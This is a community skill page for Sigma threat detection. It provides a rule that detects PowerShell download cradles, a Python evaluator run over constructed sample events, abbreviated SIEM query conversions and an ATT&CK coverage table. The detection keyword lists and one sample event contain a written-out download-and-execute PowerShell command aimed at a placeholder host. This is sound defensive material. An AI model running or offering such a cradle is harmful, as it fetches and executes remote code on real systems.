
Sigma Threat Detection Skill

Hunt threats and analyze security events using Sigma detection rules. Converts Sigma rules to SIEM queries (Splunk, Elastic, Sentinel), creates custom detection rules, and performs log-based threat analysis for SOC teams.

Skill | Community | security | v1.0.0 | MIT

Description

This skill enables threat hunting and security event analysis using the Sigma detection rule format. It can convert Sigma rules to platform-specific queries (Splunk SPL, Elastic KQL, Microsoft Sentinel KQL), create custom detection rules for new threats, and analyze log data against known attack patterns. Built for SOC analysts and security engineers.

Instructions

  1. Rule Conversion: Convert Sigma YAML rules to target SIEM platform query syntax
  2. Rule Creation: Write new Sigma rules based on threat descriptions or IOC patterns
  3. Log Analysis: Evaluate log entries against Sigma rules to identify matches
  4. Coverage Mapping: Map detection rules to MITRE ATT&CK techniques

Rules

  • Always validate Sigma YAML syntax before conversion
  • Include the MITRE ATT&CK technique ID in every rule's tags field
  • Set appropriate level (informational, low, medium, high, critical) based on true positive likelihood
  • Use selection and condition fields properly -- avoid overly broad detection patterns
  • Include falsepositives section to help analysts triage alerts
  • Test rules against sample log data when provided
  • Reference the SigmaHQ rule repository for existing coverage before writing new rules

Sigma Rule Template

title: Suspicious PowerShell Download Cradle
id: 3b6ab547-0998-4b4e-9f54-c0623e3e6f01
status: stable
description: |
    Detects PowerShell commands commonly used to download and execute payloads
    from remote servers (download cradle patterns).
author: Security Team
date: 2025/03/01
modified: 2025/03/15
references:
    - https://attack.mitre.org/techniques/T1059/001/
tags:
    - attack.execution
    - attack.t1059.001
    - attack.t1105
logsource:
    category: process_creation
    product: windows
detection:
    selection_cmdlet:
        CommandLine|contains:
            - 'Invoke-WebRequest'
            - 'Invoke-RestMethod'
            - 'wget '
            - 'curl '
            - 'Net.WebClient'
            - 'Start-BitsTransfer'
    selection_execute:
        CommandLine|contains:
            - 'IEX'
            - 'Invoke-Expression'
            - '-enc '
            - '-EncodedCommand'
            - 'FromBase64String'
    condition: selection_cmdlet and selection_execute
falsepositives:
    - Legitimate software installation scripts
    - System administration automation
level: high
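As an added example (not part of the skill's own code), the following pure-Python evaluator implements the Log Analysis step for the template above: it applies the rule's CommandLine|contains selections and its and condition to process_creation events, so a candidate rule can be checked against sample logs before it is converted. The detection block is transcribed from the YAML into a dict to avoid a YAML dependency; the events, hostnames and URLs are constructed.

```python
# Detection block of the page's rule, transcribed into a dict so the example
# runs without a YAML library (the YAML keys and values are unchanged).
DETECTION = {
    "selection_cmdlet": {"CommandLine|contains": [
        "Invoke-WebRequest", "Invoke-RestMethod", "wget ", "curl ",
        "Net.WebClient", "Start-BitsTransfer"]},
    "selection_execute": {"CommandLine|contains": [
        "IEX", "Invoke-Expression", "-enc ", "-EncodedCommand", "FromBase64String"]},
    "condition": "selection_cmdlet and selection_execute",
}

# Constructed sample events (not real telemetry); Sigma process_creation field names.
EVENTS = [
    {"Computer": "WS01", "CommandLine": "powershell.exe -nop -w hidden -c IEX "
     "(New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"},
    {"Computer": "WS02", "CommandLine": "powershell.exe Invoke-WebRequest "
     "-Uri https://updates.example.invalid/app.msi -OutFile C:\\Temp\\app.msi"},
    {"Computer": "SRV01", "CommandLine": "powershell.exe -EncodedCommand SQBFAFgA"},
]

def field_matches(spec, expected, event):
    # One `field|modifier: values` line; a list of values is an OR.
    # Sigma string matching is case-insensitive, so compare lowercased.
    field, _, modifier = spec.partition("|")
    actual = str(event.get(field, "")).lower()
    values = expected if isinstance(expected, list) else [expected]
    if modifier == "contains":
        return any(str(v).lower() in actual for v in values)
    if modifier == "":  # no modifier means exact match
        return any(str(v).lower() == actual for v in values)
    raise ValueError(f"unsupported modifier: {modifier}")

def condition_holds(expr, results):
    # not/and/or over selection results (precedence not > and > or); parentheses
    # and `1 of`/`all of` quantifiers are rejected rather than silently misread.
    if "(" in expr or " of " in expr:
        raise ValueError(f"unsupported condition syntax: {expr}")
    def literal(tok):
        negated = tok.startswith("not ")
        name = tok[4:].strip() if negated else tok.strip()
        return results[name] != negated  # KeyError on an unknown selection name
    return any(all(literal(t) for t in clause.split(" and ")) for clause in expr.split(" or "))

def rule_matches(detection, event):
    # A selection matches when every field line in it matches (implicit AND).
    results = {n: all(field_matches(k, v, event) for k, v in sel.items())
               for n, sel in detection.items() if n != "condition"}
    return condition_holds(detection["condition"], results)

def hunt(detection=DETECTION, events=EVENTS):
    # Computer of every event the rule fires on, in log order.
    return [e["Computer"] for e in events if rule_matches(detection, e)]
```

Only WS01 fires: WS02 is a plain Invoke-WebRequest download with no execution term (the falsepositives case), and SRV01 has an encoded command but no download cmdlet, so the and condition correctly keeps both quiet.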

SIEM Conversion Examples

The queries below are abbreviated illustrations and carry only part of the template's value lists; a faithful conversion includes every value from both selections (for example Invoke-RestMethod, Start-BitsTransfer and -EncodedCommand).

Splunk SPL

index=windows sourcetype=WinEventLog:Security EventCode=4688
| where match(CommandLine, "(?i)(Invoke-WebRequest|Net\.WebClient|wget|curl)")
| where match(CommandLine, "(?i)(IEX|Invoke-Expression|-enc |FromBase64String)")
| table _time, Computer, User, CommandLine, ParentCommandLine

Elastic KQL

process.command_line: (*Invoke-WebRequest* OR *Net.WebClient* OR *wget* OR *curl*)
  AND process.command_line: (*IEX* OR *Invoke-Expression* OR *-enc* OR *FromBase64String*)

Microsoft Sentinel KQL

SecurityEvent
| where EventID == 4688
| where CommandLine has_any ("Invoke-WebRequest", "Net.WebClient", "wget", "curl")
| where CommandLine has_any ("IEX", "Invoke-Expression", "-enc", "FromBase64String")
| project TimeGenerated, Computer, Account, CommandLine, ParentProcessName

MITRE ATT&CK Coverage Report

| Technique | ID | Detection Rules | Coverage |
|-----------|----|-----------------|----------|
| PowerShell | T1059.001 | 12 | HIGH |
| Scheduled Task | T1053.005 | 8 | MEDIUM |
| Registry Run Keys | T1547.001 | 6 | MEDIUM |
| Pass the Hash | T1550.002 | 3 | LOW |
| DCSync | T1003.006 | 2 | LOW |

Examples

"Convert this Sigma rule to Splunk SPL format"
"Create a detection rule for lateral movement via WMI"
"Map our current Sigma rules to MITRE ATT&CK and show gaps"
"Analyze these Windows event logs for T1059 execution techniques"